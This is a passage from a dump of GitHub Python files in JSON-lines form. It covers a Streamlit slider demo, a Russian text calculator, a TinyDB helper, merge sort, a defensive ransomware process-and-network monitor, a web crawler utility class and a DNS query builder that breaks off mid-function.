\"a\",\n \"formatter\": \"json\",\n },\n },\n \"loggers\": {\n \"kafka\": {\n \"handlers\": [\"console\"],\n \"level\": \"INFO\",\n \"propagate\": False,\n },\n },\n}","repo_name":"IrinaNizova/graduate_work","sub_path":"config/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14216990547","text":"import streamlit as st\nfrom datetime import time, datetime\n\nst.header(\"st.slider\")\n\n# Example 1. Creating a slider with different values.\n# The parameters given are the start, the end, and the default value.\n\nst.subheader(\"Slider\")\n\nage = st.slider(\"How old are you?\", 0, 130, 25)\nst.write(\"I'm\", age, \"years old\")\n\n# Example 2. st.slider() can be used to define a range\n\nst.subheader(\"Range slider\")\n\nvalues = st.slider(\"Select a range of values\",\n 0.0, 100.0, (25.0, 75.0))\nst.write(\"Values:\", values)\n\n# Example 3. The values used by a slider can also be datetime formats, not just numerical values\n\nst.subheader(\"Range time slider\")\n\nappointment = st.slider(\"Schedule your appointment:\",\n value = (time(11, 30), time(12, 45)))\nst.write(\"You're scheduled for:\", appointment)\n\n# Example 4. Here the slider takes the default value, and sets\n# default range to the value (in this case 14 days ahead and before)\n\nst.subheader(\"Datetime slider\")\n\nstart_time = st.slider(\"When do you start?\",\n value = datetime(2020, 1, 1, 9, 30),\n format = \"DD/MM/YY - hh:mm\")\nst.write(\"Start time:\", start_time)","repo_name":"marmeladof/30DaysOfStreamlit","sub_path":"day8_streamlit_app.py","file_name":"day8_streamlit_app.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36520278304","text":"# НАЧАЛО ИМПОРТА БИБЛИОТЕК\r\nimport re\r\nfrom num2words import num2words\r\nfrom googletrans import Translator\r\nfrom word2number.w2n import word_to_num\r\nfrom word2number import w2n\r\n\r\n# КОНЕЦ ИМПОРТА БИБЛИОТЕК\r\n\r\n# НАЧАЛО РАБОТЫ СО СЛОВАРЯМИ\r\n\r\noperation_dict = ['плюс', 'минус', 'умножить', 'разделить на', 'поделить на', 'умножить на'] # СЛОВАРЬ ОПЕРАЦИЙ\r\n\r\nadot_dict = {'десятых': 0.1, 'сотых': 0.01, 'тысячных': 0.001, 'десятитысячных': 0.0001, # СЛОВАРЬ РАЗРЯДОВ\r\n 'стотысячных': 0.00001, 'миллионных': 0.000001,\r\n 'десятая': 0.1, 'сотая': 0.01, 'тысячная': 0.001, 'десятитысячная': 0.0001,\r\n 'стотысячная': 0.00001, 'миллионная': 0.000001\r\n }\r\n\r\nadot_usual = {1: 'десятых', 2: 'сотых', 3: 'тысячных', 4: 'десятитысячных', 5: 'стотысячных', 6: 'миллионных'}\r\n # СЛОВАРЬ РАЗРЯДОВ ДЛЯ ЧИСЕЛ С ТОЧКОЙ\r\n\r\n# КОНЕЦ РАБОТЫ СО СЛОВАРЯМИ\r\n\r\n\"\"\"\r\n Функция перевода входного числа из словестного формата в числовой\r\n Происходит путем перевода из русского языка в английский, и использования сторонней библиотеки word2number\r\n \r\n\"\"\"\r\ndef translate_to_letter(word):\r\n error = True\r\n while error:\r\n try: # Пытаемся сделать))\r\n translator = Translator() # Инициализируем гугл переводчик\r\n second_rank = None # Будем здесь хранить стрепень десятичной дроби\r\n for string in adot_dict: # Тут мы ищем эту степень во входной строки\r\n match2 = re.search(string, word)\r\n if match2:\r\n second_rank = string\r\n main_letter_adot = ' '\r\n\r\n match = re.search(r' и ', word) # Проверяем на наличие десятичной части\r\n if match:\r\n full_str = word.split(' и ') # Делим текст на лист из слов\r\n before_dot = translator.translate(full_str[0], src='ru', dest='en').text # Переводим текст части до запятой на английский\r\n before_dot = w2n.word_to_num(before_dot) # с помощью сторонней библиотеки word2number переводим наш текст в числа\r\n\r\n after_dot = full_str[1] # Собираем часть после запятой\r\n\r\n if after_dot[-1] == ' ':\r\n after_dot = after_dot[:-1]\r\n\r\n after_dot = after_dot.split(' ') # превращаем текст после запятой в лист из слов\r\n rank = after_dot[-1] # Находим степень\r\n del after_dot[-1] # Удаляем степень\r\n\r\n main_letter_adot = ' '.join(after_dot)\r\n\r\n main_letter_adot = main_letter_adot.replace(\"одна\", \"один\") # ЗАМЕНА ОДИН НА ОДНА\r\n\r\n main_letter_adot = translator.translate(main_letter_adot, src='ru', dest='en').text # Переводим в английский\r\n main_letter_adot = w2n.word_to_num(main_letter_adot) # Переводим в число\r\n\r\n\r\n rank = adot_dict[rank] # Превращаем степень из слова в число\r\n\r\n\r\n word = before_dot + main_letter_adot*rank # Соединяем целую и дробную часть\r\n\r\n elif(second_rank != None): # Зайдем если есть только дробная часть (баш ватылды)\r\n\r\n if word[-1] == ' ':\r\n word = word[:-1]\r\n\r\n word = word.split(' ') # Делим текст на лист из слов\r\n rank = word[-1] # Находим степень\r\n del word[-1] # Удаляем степень\r\n\r\n\r\n main_letter_adot = ' '.join(word) # Содираем для перевода\r\n\r\n main_letter_adot = main_letter_adot.replace(\"одна\", \"один\") # ЗАМЕНА ОДНА НА ОДИН\r\n\r\n\r\n main_letter_adot = translator.translate(main_letter_adot, src='ru', dest='en').text # Переводим в английский\r\n main_letter_adot = w2n.word_to_num(main_letter_adot) # Переводим в число\r\n\r\n rank = adot_dict[rank] # Превращаем степень из слова в число\r\n\r\n\r\n word = main_letter_adot * rank # Записывем дробную часть\r\n else: # Зайдем если дробной части нет, что и есть хорошо\r\n\r\n word = translator.translate(word, src='ru', dest='en').text # Переводим в английский\r\n word = w2n.word_to_num(word) # Переводим в число\r\n error = False\r\n return word\r\n except ValueError: # Если какие-то ошибки сообщаем об этом\r\n return -1\r\n except AttributeError:\r\n error = True\r\n except KeyError:\r\n return -1\r\n\r\n# КОНЕЦ ФУНКЦИИ ПЕРЕВОДА\r\n\r\n# НАЧАЛО ФУНКЦИИ ДЕЛЕНИЯ\r\n\"\"\"\r\n Функция деления с нахоженим десятичной дроби и периода.\r\n После нахожедения челой части путем обычного деления, для нахождения нецелой части программа меняет делимое\r\n на остаток от деления, домнажает на десять. Также с помощью словоря отслеживается текущие делители, чтобы они\r\n не повторялись. Если все же повторяются, то переводит их в период\r\n\r\n\"\"\"\r\ndef division(numerator, denominator):\r\n # Делимое и делитель умножаются на 10.000.000 что бы они были целыми, т. к. алгоритм работает только с целыми числами\r\n numerator = int(numerator * 10000000)\r\n denominator = int(denominator * 10000000)\r\n if (numerator % denominator == 0): # Проверка на делимость нацело\r\n ans = str(numerator // denominator) # Делим, возвращаем, красота!!!\r\n return ans\r\n else:\r\n ans = str(numerator // denominator) + \".\" # Нахождение целой части\r\n l = {} # Словарь текущих делителей\r\n index = 0 # Переменная для отслеживания когда встречается текущее делимое\r\n numerator = numerator % denominator # Для нахождения дробной части делимое становиться остатком от деления\r\n l[numerator] = index\r\n flag = False\r\n while flag == False: # Проверка на зацикливания текущего делимого после запятой, т. е. периодичность\r\n if numerator == 0: # Если текущий делитель равен нулю, то мы получаем в ответе окончалеьное частное, выходим из цикла\r\n break\r\n digit = numerator * 10 // denominator # Находим текущую цифру после запятой\r\n numerator = numerator * 10 - (numerator * 10 // denominator) * denominator # Находим текущее делимое\r\n if numerator not in l: # Если текущее делимое еще не встречалось, то записываем его в словарь, с ключом index\r\n ans += str(digit)\r\n index += 1\r\n l[numerator] = index\r\n else: # Иначе мы получаем цикл делителей, значит получаем периодичность\r\n ans += str(digit) + \")\"\r\n ans = ans[:l.get(numerator) + len(ans[:ans.index(\".\") + 1])] + \"(\" + ans[l.get(numerator) + len(\r\n ans[:ans.index(\".\") + 1]):] # Зная начало периода с ключом index, можем записать в ans частное\r\n flag = True\r\n return ans\r\n\r\n\r\n# КОНЕЦ ФУНКЦИИ ДЕЛЕНИЯ\r\n\r\ndef calc(main_str): # ФУНКЦИЯ КАЛЬКУЛЯТОР, ЕСЛИ ВОЗВРАЩАЕТСЯ \"-1\" - следовательно что-то сделано неверно!\r\n pattern = re.compile(r'[а-яёА-ЯЁ]+')\r\n goon = re.match(pattern, main_str)\r\n if not goon: # ПРОВЕРКА НА РУССКИЕ СИМВОЛЫ\r\n return -1\r\n if not main_str: # ПРОВЕРКА НА ПУСТОЕ ЗНАЧЕНИЕ\r\n return -1\r\n current_operation = 'error'\r\n for string in operation_dict: # ПОИСК ОПЕРАЦИИ В СТРОКЕ\r\n match = re.search(string, main_str)\r\n if match:\r\n current_operation = string # ОПЕРАЦИЯ\r\n if current_operation == 'error':\r\n return -1\r\n try:\r\n tokens = main_str.split(' ' + current_operation + ' ') # ДЕЛИМ ЧИСЛО УДАЛЯЯ ОПЕРАЦИЮ\r\n first_num, second_num = tokens[:-1], tokens[-1:]\r\n first_num, second_num = first_num[0], second_num[0]\r\n except IndexError: # ПРОВЕРКА НА ПРАВИЛЬНОСТЬ ВВЕДЕНИЕ\r\n return -1\r\n\r\n\r\n first_num = translate_to_letter(first_num) # ПЕРЕВОД ДВУХ ЧИСЕЛ ИЗ ТЕКСТА В ЧИСЛА\r\n second_num = translate_to_letter(second_num)\r\n\r\n if (first_num == -1) or (second_num == -1): # ПРОВЕРКА НА ОШИБКУ (К ФУНКЦИЯМ ПЕРЕВОДА)\r\n return -1\r\n\r\n if current_operation == \"плюс\": # ОПЕРАЦИЯ СЛОЖЕНИЯ\r\n ans = first_num + second_num\r\n elif current_operation == \"умножить\" or current_operation == \"умножить на\": # ОПЕРАЦИЯ УМНОЖЕНИЯ\r\n ans = first_num * second_num\r\n elif current_operation == \"минус\": # ОПЕРАЦИЯ ВЫЧИТАНИЯ\r\n ans = first_num - second_num\r\n elif current_operation == \"разделить на\" or current_operation == \"поделить на\": # ОПЕРАЦИЯ ДЕЛЕНИЯ,\r\n ans = division(first_num, second_num) # ВЫПОЛНЯЕМАЯ ОТДЕЛЬНОЙ ФУНКЦИЕЙ\r\n # division\r\n\r\n if isinstance(ans, str) == False:\r\n ans = round(ans, 6)\r\n ans = str(ans)\r\n\r\n match = re.search('\\.', ans) # ПРОВЕРКА НА НАЛИЧИЕ ТОЧКИ (ДЕСЯТИЧНОГО ЧИСЛА)\r\n if match:\r\n ans = ans.split('.') # РАЗДЕЛЕНИЕ ЧИСЛА НА \"ДО ТОЧКИ\" и \"ПОСЛЕ ТОЧКи\"\r\n before_dot = num2words(ans[0], lang='ru') # ПЕРЕВОД ЧИСЛА ДО ТОЧКИ\r\n after_dot = ans[1] # ЧИСЛО ПОСЛЕ ТОЧКИ\r\n\r\n match = re.search(r'\\(', after_dot) # ПРОВЕРКА ЧИСЛА НА НАЛИЧИЕ ПЕРИОДА\r\n if match:\r\n after_dot_parts = re.split(r'\\(', after_dot) # ДЕЛИМ СТРОКУ НА ПЕРИОД И ТО, ЧТО ДО ПЕРИОДА, НО ПОСЛЕ ТОЧКИ\r\n after_dot_parts[1] = after_dot_parts[1][:-1]\r\n if len(after_dot_parts[0]) + len(after_dot_parts[1]) > 6: # ОГРАНИЧЕНИЕ НА ДЛИНУ ПЕРИОДА (6)\r\n after_dot = (after_dot_parts[0] + after_dot_parts[1])[:6]\r\n else:\r\n num_of_zeroes_in_period = 0\r\n for i in after_dot_parts[1]:\r\n if i == '0':\r\n num_of_zeroes_in_period += 1 # СЧЕТЧИК НУЛЕЙ В ПЕРИОДЕ ДО ОСНОВНОГО ЧИСЛА\r\n else:\r\n break\r\n after_dot_parts[1] = num2words(after_dot_parts[1][num_of_zeroes_in_period:], lang='ru') # ПЕРЕВОД ЧИСЛА\r\n\r\n ans = before_dot\r\n\r\n if len(after_dot_parts[0]) != 0: # ПРОВЕРКА ЕСТЬ ЛИ ВООБЩЕ ЧТО-ТО ДО ПЕРИОДА\r\n rank_10 = adot_usual[len(after_dot_parts[0])] # ДЛИНА ЧИСЛА ПОСЛЕ ТОЧКИ, НЕЯВЛЯЮЩИМСЯ ПЕРИОДОМ\r\n for i in after_dot_parts[0]:\r\n if i == '0': # УКОРАЧИВАНИЕ ЧИСЛА ПО ПОСЛЕДНИМ НУЛЯМ\r\n after_dot_parts[0] = after_dot_parts[0][1:]\r\n else:\r\n break\r\n after_dot_parts[0] = num2words(int(after_dot_parts[0]), lang='ru') #\r\n ans += ' и ' + after_dot_parts[0] + ' ' + rank_10\r\n\r\n ans += ' и ' + \"ноль \" * num_of_zeroes_in_period + after_dot_parts[1] + \" в периоде\"\r\n match = re.search(r'\\(', after_dot)\r\n if not match: # ЕСЛИ НЕТ ПЕРИОДА В ЧИСЛЕ\r\n rank_10 = adot_usual[len(after_dot)] # ДЛИНА ЧИСЛА ПОСЛЕ ТОЧКИ, НЕЯВЛЯЮЩИМСЯ ПЕРИОДО\r\n for i in after_dot:\r\n if i == '0': # УКОРАЧИВАНИЕ ЧИСЛА ПО ПОСЛЕДНИМ НУЛЯМ\r\n after_dot = after_dot[1:]\r\n else:\r\n break\r\n if after_dot == '':\r\n ans = before_dot\r\n else:\r\n after_dot = num2words(int(after_dot), lang='ru')\r\n ans = before_dot + ' и ' + after_dot + ' ' + rank_10 # ФОРМИРОВАНИЕ ГОТОВОГО ОТВЕТА В СТРОКУ\r\n\r\n\r\n else: # ЕСЛИ ОБЫЧНОЕ ЧИСЛО\r\n ans = num2words(ans, lang='ru') # ПЕРЕВОД ЧИСЛА ОБРАТНО В ТЕКСТ\r\n\r\n return ans # ВОЗВРАЩЕНИЕ ФУНКЦИЕЙ calc() ответа\r\n\r\n\"\"\"\r\n Основная функция\r\n Считаем строку, пытаемся выполнить в ней описанною операцию. Если введено некорректно, выполняем заново,\r\n пока не сможем выполнить \r\n \r\n\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n flag = True\r\n while flag: # ЦИКЛ ДЛЯ ПРОВЕРКИ КОРРЕКТНОСТИ ВВЕДЕНЫХ ЗНАЧЕНИЙ\r\n line_main = input('Введите выражение: ') # СЧИТЫВАНИЕ СТРОКИ В ВИДЕ: \"ЧИСЛО ОПЕРАЦИЯ ЧИСЛО\"\r\n line_main = line_main.lower() # ЗАНИЖЕНИЕ СТРОКИ В НИЖНИЙ РЕГИСТР\r\n\r\n ans = calc(line_main) # ВЫЗОВ ФУНКЦИИ ОСНОВНОГО КАЛЬКУЛЯТОРА\r\n if ans != -1: # ПРОВЕРКА НА ОШИБКУ | ОШИБКА = -1, ИНАЧЕ - ОШИБОК НЕТ\r\n print('Ответ: ', ans)\r\n flag = False # ВЫВОД СТРОКИ И ЗАВЕРШЕНИЕ ПРОГРАММЫ\r\n else:\r\n flag = True\r\n print('Вы ввели неверное выражение, введите, пожалуйста, заново.') # СООБЩЕНИЕ ОБ ОШИБКЕ","repo_name":"bombermon/text_calcalator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16305,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11500139191","text":"from tinydb import TinyDB, Query\nfrom tinydb.operations import delete\n\nimport dbUser\n\ndbFileName = 'db.json'\n\nuserTable = TinyDB(dbFileName).table('users')\nstatTable = TinyDB(dbFileName).table('stat')\nUser = Query()\n\ndef reassign_db():\n global userTable\n global statTable\n global User\n\n userTable = TinyDB(dbFileName).table('users')\n statTable = TinyDB(dbFileName).table('stat')\n User = Query()\n\ndef has_user(teleId):\n global userTable\n return userTable.contains(User.teleId == teleId)\n\ndef store_user(user):\n global userTable\n userTable.remove(User.teleId == user.teleId)\n userTable.insert(user.toDict())\n\ndef get_users():\n global userTable\n return [dbUser.dbUser.parse(x) for x in userTable.all()]\n\ndef get_user(teleId):\n global userTable\n return dbUser.dbUser.parse(userTable.search(User.teleId == teleId)[0])","repo_name":"Coestaris/ReplyItBot","sub_path":"src/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"36469652503","text":"def merge_sort(lista):\n list_length = len(lista)\n\n if list_length == 1:\n return lista\n\n mid_point = list_length // 2\n\n left_partition = merge_sort(lista[:mid_point])\n right_partition = merge_sort(lista[mid_point:])\n\n return merge(left_partition, right_partition)\n\n\ndef merge(left, right):\n output = []\n i = j = 0\n\n while i < len(left) and j < len(right):\n\n if left[i] < right[j]:\n output.append(left[i])\n i += 1\n else:\n output.append(right[j])\n j += 1\n\n output.extend(left[i:])\n output.extend(right[j:])\n\n return output\n","repo_name":"KowalskiIT/minor-projects","sub_path":"all_sort_of_sorts/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18185302925","text":"import psutil\r\nimport time\r\nimport threading\r\nimport json\r\n\r\nfrom config import Config\r\nfrom detect_ransomware import DetectRansomware\r\n\r\n\r\ndef get_current_running_process():\r\n running_process = []\r\n for proc in psutil.process_iter(['pid', 'name']):\r\n try:\r\n # Get process info as named tuple (pid, name)\r\n proc_info = proc.as_dict(attrs=['pid', 'name'])\r\n running_process.append((proc_info['pid'], proc_info['name']))\r\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\r\n pass\r\n return running_process\r\n\r\n\r\nlock = threading.Lock()\r\n\r\n\r\nclass ProcessesToMonitor:\r\n global lock\r\n\r\n def __init__(self):\r\n self.processes = dict()\r\n\r\n def add_item(self, pid, process_name):\r\n with lock:\r\n self.processes[pid] = process_name\r\n\r\n def remove_item(self, pid):\r\n with lock:\r\n self.processes[pid] = None\r\n\r\n def get_processes_to_monitor(self):\r\n with lock:\r\n return self.processes\r\n\r\n\r\nprocesses_to_monitor = ProcessesToMonitor()\r\n\r\n\r\ndef monitor_process():\r\n print('[+] Monitoring Process')\r\n global processes_to_monitor\r\n previous_processes = get_current_running_process()\r\n\r\n while True:\r\n try:\r\n current_processes = get_current_running_process()\r\n\r\n # Find the new and exited processes\r\n new_processes = [p for p in current_processes if p not in previous_processes]\r\n exited_processes = [p for p in previous_processes if p not in current_processes]\r\n\r\n # Print the new and exited processes\r\n for pid, name in new_processes:\r\n print(\"New process started: PID={} Name={}\".format(pid, name))\r\n processes_to_monitor.add_item(pid, name)\r\n\r\n for pid, name in exited_processes:\r\n print(\"Process exited: PID={} Name={}\".format(pid, name))\r\n processes_to_monitor.remove_item(pid)\r\n\r\n # Update the previous list of processes and wait for 1 second before updating again\r\n previous_processes = current_processes\r\n time.sleep(1)\r\n except KeyboardInterrupt:\r\n exit(0)\r\n except (OSError, Exception) as _:\r\n print('[!] Exception in Monitoring Process')\r\n\r\n\r\ndef monitor_resource_activity():\r\n global processes_to_monitor\r\n ransomware_detection = DetectRansomware()\r\n results = dict()\r\n cur_count = 21\r\n while True:\r\n if cur_count > 999999: # To prevent integer overflow\r\n cur_count = 1\r\n if (cur_count % Config.DUMP_INTERVAL) == 0:\r\n if ransomware_detection.resource_activity_detection(results):\r\n ransomware_detection.take_action_on_ransomware_detection()\r\n with open('resource_activity', 'w') as f:\r\n json.dump(results, f)\r\n cur_count += 1\r\n try:\r\n processes = processes_to_monitor.get_processes_to_monitor()\r\n for pid, name in processes.items():\r\n if name is None:\r\n continue\r\n try:\r\n process_obj = psutil.Process(pid)\r\n except (psutil.NoSuchProcess, Exception):\r\n continue\r\n process_key = str(pid) + ':' + name\r\n if not results.get(process_key, False):\r\n results[process_key] = dict({\r\n 'cpu_percent': [process_obj.cpu_percent()],\r\n 'ram': [process_obj.memory_info().rss],\r\n 'read_count': [process_obj.io_counters().read_count],\r\n 'write_count': [process_obj.io_counters().write_count],\r\n 'read_bytes': [process_obj.io_counters().read_bytes],\r\n 'write_bytes': [process_obj.io_counters().write_bytes]\r\n })\r\n else:\r\n results[process_key]['cpu_percent'].append(process_obj.cpu_percent())\r\n results[process_key]['ram'].append(process_obj.memory_info().rss)\r\n results[process_key]['read_count'].append(process_obj.io_counters().read_count)\r\n results[process_key]['write_count'].append(process_obj.io_counters().write_count)\r\n results[process_key]['read_bytes'].append(process_obj.io_counters().read_bytes)\r\n results[process_key]['write_bytes'].append(process_obj.io_counters().write_bytes)\r\n time.sleep(1)\r\n except KeyboardInterrupt:\r\n exit(0)\r\n except Exception as ex:\r\n print('[!] Exception in monitoring resource activity')\r\n print(ex)\r\n\r\n\r\ndef monitor_network_activity():\r\n ransomware_detection = DetectRansomware()\r\n global processes_to_monitor\r\n results = dict()\r\n cur_count = 1\r\n while True:\r\n if cur_count > 999999: # To prevent integer overflow\r\n cur_count = 1\r\n if (cur_count % Config.DUMP_INTERVAL) == 0:\r\n if ransomware_detection.network_based_activity_detection(results):\r\n ransomware_detection.take_action_on_ransomware_detection()\r\n with open('network_activity', 'w') as f:\r\n json.dump(results, f)\r\n cur_count += 1\r\n try:\r\n processes = processes_to_monitor.get_processes_to_monitor()\r\n for pid, name in processes.items():\r\n if name is None:\r\n continue\r\n try:\r\n process_obj = psutil.Process(pid)\r\n except (psutil.NoSuchProcess, Exception):\r\n continue\r\n connections = process_obj.connections()\r\n for conn in connections:\r\n process_key = str(pid) + ':' + name\r\n network_activity = dict({\r\n 'family': str(conn.family), \r\n 'type': str(conn.type),\r\n 'laddr': str(conn.laddr),\r\n 'raddr': str(conn.raddr),\r\n 'status': conn.status\r\n })\r\n if not results.get(process_key, False):\r\n results[process_key] = [network_activity]\r\n else:\r\n results[process_key].append(network_activity)\r\n time.sleep(10)\r\n except KeyboardInterrupt:\r\n exit(0)\r\n except Exception as ex:\r\n print('[!] Exception in monitoring network activity')\r\n print(ex)\r\n\r\n\r\nif __name__ == '__main__':\r\n t1 = threading.Thread(target=monitor_process)\r\n t2 = threading.Thread(target=monitor_resource_activity)\r\n t3 = threading.Thread(target=monitor_network_activity)\r\n\r\n t1.start()\r\n t2.start()\r\n t3.start()\r\n\r\n t1.join()\r\n t2.join()\r\n t3.join()\r\n","repo_name":"tarunchand/RansomCombatant","sub_path":"process_monitor.py","file_name":"process_monitor.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"1839964466","text":"from lxml import etree\r\nimport requests\r\nimport re\r\n\r\n\r\nclass PicTools(object):\r\n def __init__(self):\r\n self.headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'\r\n }\r\n # 匹配任何不可见字符,包括空格、制表符、换页符等等\r\n self.pattern_space = re.compile('\\s')\r\n\r\n # 将url转为redis的key(将:转为@)\r\n def convert_url2key(self, url):\r\n return url.replace(':', '@@@')\r\n\r\n # 取后缀,判断是不是图片,取最后一个点后面就是后缀,lower将字符串全变成小写\r\n def get_postfix(self, url):\r\n start = url.rfind('.') + 1\r\n if start:\r\n return url[start:].lower()\r\n return ''\r\n\r\n def extract_html(self, url):\r\n '''\r\n ①解决编码问题, 通过try exception 获取html源码。\r\n ②加入Requests Headers\r\n :param url:\r\n :return: [html, after_url]\r\n '''\r\n # isinstance判断变量是否是str这个类型\r\n if not isinstance(url, str):\r\n url = url.decode()\r\n ori = requests.get(url, headers=self.headers)\r\n b_html = ori.content\r\n after_url = ori.url\r\n try:\r\n html = b_html.decode(encoding='utf-8')\r\n except:\r\n try:\r\n html = b_html.decode(encoding='gbk')\r\n except:\r\n html = ori.text\r\n return [html, after_url]\r\n\r\n # 取域名,http://占7个字符,https://占8个字符\r\n def get_hosts(self, url):\r\n try:\r\n end = url.index('/', 8)\r\n # 返回域名\r\n return url[:end]\r\n except:\r\n return url\r\n\r\n # 将一个href转换成绝对链接,startswith判断是否以指定字符串开头,有些href是javascript脚本代码或#之类的链接\r\n def deal_relative_href(self, front_href, h):\r\n if isinstance(front_href, bytes):\r\n front_href = front_href.decode()\r\n exit_set = ('#', '', '/')\r\n if h.startswith('java') or (h in exit_set):\r\n return front_href\r\n is_https = h.startswith('https')\r\n\r\n if h.startswith('//'):\r\n if is_https:\r\n # h = 'https:' + h\r\n # print(h)\r\n # return h\r\n return 'https:' + h\r\n else:\r\n # h = 'http:' + h\r\n # print(h)\r\n # return h\r\n return 'http:' + h\r\n # return 'http:' + h\r\n if self.pattern_space.search(h):\r\n return front_href\r\n if not h.startswith('http'):\r\n return front_href + h\r\n else:\r\n return h\r\n","repo_name":"xuxin19941214/quanwang-tupian","sub_path":"全网爬虫图片/PicTools.py","file_name":"PicTools.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18154618033","text":"import sys, struct, os.path, time, json, ipaddress, random, codecs\nfrom socket import*\nfrom threading import Thread\n\n# source = https://stackoverflow.com/questions/54278329/how-to-parse-dns-question-field-with-python-raw-sockets\ndef data_packet_dns(data):\n tuple_data_dns = struct.unpack('!HHHHHH', data[:12])\n identification = tuple_data_dns[0]\n flags = tuple_data_dns[1] \n queries = tuple_data_dns[2]\n response = tuple_data_dns[3]\n authority = tuple_data_dns[4]\n additional = tuple_data_dns[5]\n qr = (flags & 32768) != 0\n opcode = (flags & 30720 ) >> 11\n aa = (flags & 1024) != 0\n tc = (flags & 512) != 0\n rd = (flags & 256) != 0\n ra = (flags & 128) != 0\n z = (flags & 112) >> 4\n rcode = flags & 15\n return queries, response, authority, additional, rcode\n \ndef constructQuery(hostname, type, clas,recurse):#1 means recursion desired\n\tif(recurse == 1):\n\t\tquery = bytes(\"\\x08\\x08\" + \"\\x01\\x00\" + \"\\x00\\x01\" + \"\\x00\\x00\" + \"\\x00\\x00\" + \"\\x00\\x00\", 'utf-8')\n\telse:\n\t\tquery = bytes(\"\\x08\\x08\" + \"\\x00\\x00\" + \"\\x00\\x01\" + \"\\x00\\x00\" + \"\\x00\\x00\" + \"\\x00\\x00\", 'utf-8')\n\td = bytes(\"\", 'utf-8')\n\n\tfor a in hostname.split('.'):\n\t\td += struct.pack(\"!b\" + str(len(a)) + \"s\", len(a), bytes(a, \"utf-8\"))\n\n\tquery = query + d + bytes(\"\\x00\", 'utf-8') #terminate domain with zero len\n\tif type=='A'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x01\" + \"\\x00\\x01\", 'utf-8') #type A, class IN\n\telif type=='AAAA'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x1c\" + \"\\x00\\x01\", 'utf-8') #type AAAA, class IN\n\telif type=='NS'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x02\" + \"\\x00\\x01\", 'utf-8') #type NS, class IN\n\telif type=='MX'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x0f\" + \"\\x00\\x01\", 'utf-8') #type MX, class IN\n\telif type=='CNAME'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x05\" + \"\\x00\\x01\", 'utf-8') #type CNAME, class IN\n\telif type=='SOA'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x06\" + \"\\x00\\x01\", 'utf-8') #type SOA, class IN\n\telif type=='TXT'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x10\" + \"\\x00\\x01\", 'utf-8') #type TXT, class IN\n\telif type=='PTR'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x0c\" + \"\\x00\\x01\", 'utf-8') #type PTR, class IN\n\treturn query\n\ndef str_from_pointer(response, p):\n\ti = 0\n\twhile(response[i]!=192 and response[i+1]!=12):#start of answer\n\t\tstart = i+1\n\t\ti+=1\n\t\t\n\tres = \"\"\n\ti = 0\n\tif p < start:\n\t\tstop = len(response)-p\n\telse:\n\t\tlength = response[p-1]\n\t\tstop = p+length-1\n\t\t\n\twhile (p < stop):\n\t\tsize = response[p]\n\t\tif(size == 192):\n\t\t\tres += str_from_pointer(response, response[p+1])\n\t\t\tp+=1\n\t\t\tres += \".\"\n\t\t\tcontinue\n\t\tif(size == 0):\n\t\t\tbreak\n\t\tfor j in range(1,size+1):\n\t\t\tres += chr(response[p+j])\n\t\tres += \".\"\n\t\tp += size+1\n\treturn res\n\ndef get_ipv4(response,start):\n\t#name\n\tres = \"\"\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\n\tstart += 12 #points to start of ip address\n\tip = response[start:start+4]\n\tipv4 = \"\"\n\tfor j in range(0,4):\n\t\tipv4 += str(ip[j])\n\t\tif(j != 3):\n\t\t\tipv4 += \".\"\n\treturn res,ipv4\n\ndef get_ipv6(response,start):\n\t#name\n\tres = \"\"\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\t\t\t\t\t\n\tbeg = start+12\n\t#last 16 bytes contains ip address\n\tip = response[beg:beg+16]\n\tipv6 = \"\"\n\tfor i in range(0,16,2):\n\t\ta = str(hex(ip[i])).split('0x',1)[1]\n\t\tb = str(hex(ip[i+1])).split('0x',1)[1]\n\t\tif(len(b) < 2):\n\t\t\tb = \"0\"+ b\n\t\tipv6 += a+b\n\t\tif(i != 14):\n\t\t\tipv6 += \":\"\n\t#ipv6 has ip address\n\treturn res,ipv6\t\n\t\t\ndef get_NS(response,start):#also same for CNAME\n\t#nameserver\n\tres=\"\";ns=\"\";\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\t\n\tstart = start+12\n\tns = str_from_pointer(response, start)\t\t\t\n\treturn res[:-1],ns[:-1]\n\ndef get_MX(response,start):\n\t#nameserver\n\tres=\"\";mx=\"\";\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\t\t\t\t\t\n\tlength = response[start+11]\n\ta = response[start+12]\n\tb = response[start+13]\n\tpreference = int(a)*16*16 + int(b)\n\tstart = start+14\n\tfor i in range(start,start+length-2):\n\t\tx = response[i]\n\t\tif x == 